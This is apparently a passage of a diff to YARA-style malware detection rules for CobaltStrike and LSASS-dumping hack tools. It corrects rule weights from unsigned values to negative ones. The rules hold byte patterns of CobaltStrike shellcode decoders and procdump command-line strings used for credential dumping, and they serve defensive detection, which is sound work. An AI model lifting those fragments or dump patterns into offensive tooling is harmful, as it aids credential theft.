$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -10,11 +10,11 @@ rule HackTool_Win64_CobaltStrike_D{
|
|||
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
|
||||
$a_01_4 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
|
||||
$a_03_5 = {b9 00 00 10 00 e8 90 02 3c ba 7f 66 04 40 8b c8 48 8b 90 02 08 89 08 48 8b 4b 20 90 00 } //10
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -9,11 +9,11 @@ rule HackTool_Win64_CobaltStrike_D_{
|
|||
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
|
||||
$a_01_3 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
|
||||
$a_03_4 = {b9 00 00 10 00 e8 90 02 3c ba 7f 66 04 40 8b c8 48 8b 90 02 08 89 08 48 8b 4b 20 90 00 } //10
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -6,11 +6,11 @@ rule HackTool_Win64_CobaltStrike_E_{
|
|||
strings :
|
||||
$a_01_0 = {eb 27 5b 8b 2b 83 c3 04 8b 13 31 ea 83 c3 04 53 8b 33 31 ee 89 33 31 f5 83 c3 04 83 ea 04 31 f6 39 f2 } //1
|
||||
$a_01_1 = {eb 33 5d 8b 45 00 48 83 c5 04 8b 4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55 00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 } //1
|
||||
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_3 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_3 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*65436+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436) >=1
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*-100+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100) >=1
|
||||
|
||||
}
|
||||
|
|
@ -6,13 +6,13 @@ rule HackTool_Win64_CobaltStrike_F{
|
|||
strings :
|
||||
$a_01_0 = {b8 4f ec c4 4e 41 f7 e1 41 8b c1 c1 ea 02 41 ff c1 6b d2 0d 2b c2 8a 4c 18 10 41 30 0c 38 } //1
|
||||
$a_03_1 = {31 d2 4c 8b 90 01 01 41 f7 f1 49 01 cb 48 ff c1 89 d0 8a 44 03 10 41 30 03 90 00 } //1
|
||||
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_3 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_6 = {7f 00 00 18 00 00 00 00 00 00 00 ff ff ff ff } //65436
|
||||
$a_01_7 = {f7 7f 00 00 2a 00 00 00 00 00 00 00 ff ff ff ff } //65436
|
||||
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_3 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
$a_01_6 = {7f 00 00 18 00 00 00 00 00 00 00 ff ff ff ff } //-100
|
||||
$a_01_7 = {f7 7f 00 00 2a 00 00 00 00 00 00 00 ff ff ff ff } //-100
|
||||
condition:
|
||||
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_01_2 & 1)*65436+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436) >=1
|
||||
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_01_2 & 1)*-100+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100) >=1
|
||||
|
||||
}
|
||||
|
|
@ -6,11 +6,11 @@ rule HackTool_Win64_CobaltStrike_F_{
|
|||
strings :
|
||||
$a_01_0 = {b8 4f ec c4 4e 41 f7 e1 41 8b c1 c1 ea 02 41 ff c1 6b d2 0d 2b c2 8a 4c 18 10 41 30 0c 38 } //1
|
||||
$a_03_1 = {31 d2 4c 8b 90 01 01 41 f7 f1 49 01 cb 48 ff c1 89 d0 8a 44 03 10 41 30 03 90 00 } //1
|
||||
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_3 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_2 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_3 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_4 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_5 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_01_2 & 1)*65436+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436) >=1
|
||||
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_01_2 & 1)*-100+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100) >=1
|
||||
|
||||
}
|
||||
|
|
@ -4,12 +4,12 @@ rule HackTool_Win64_DumpLsass_C{
|
|||
description = "HackTool:Win64/DumpLsass.C,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 05 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65526 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65526
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-10 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-10
|
||||
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 36 00 34 00 2e 00 65 00 78 00 65 00 } //10 \procdump64.exe
|
||||
$a_00_3 = {2d 00 6d 00 } //5 -m
|
||||
$a_00_4 = {2f 00 6d 00 } //5 /m
|
||||
condition:
|
||||
((#a_00_0 & 1)*65526+(#a_02_1 & 1)*65526+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
|
||||
((#a_00_0 & 1)*-10+(#a_02_1 & 1)*-10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
|
||||
|
||||
}
|
||||
|
|
@ -4,12 +4,12 @@ rule HackTool_Win64_DumpLsass_C_Ofn{
|
|||
description = "HackTool:Win64/DumpLsass.C!Ofn,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 05 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65526 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65526
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-10 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-10
|
||||
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 00 00 } //10
|
||||
$a_00_3 = {2d 00 6d 00 } //5 -m
|
||||
$a_00_4 = {2f 00 6d 00 } //5 /m
|
||||
condition:
|
||||
((#a_00_0 & 1)*65526+(#a_02_1 & 1)*65526+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
|
||||
((#a_00_0 & 1)*-10+(#a_02_1 & 1)*-10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
|
||||
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue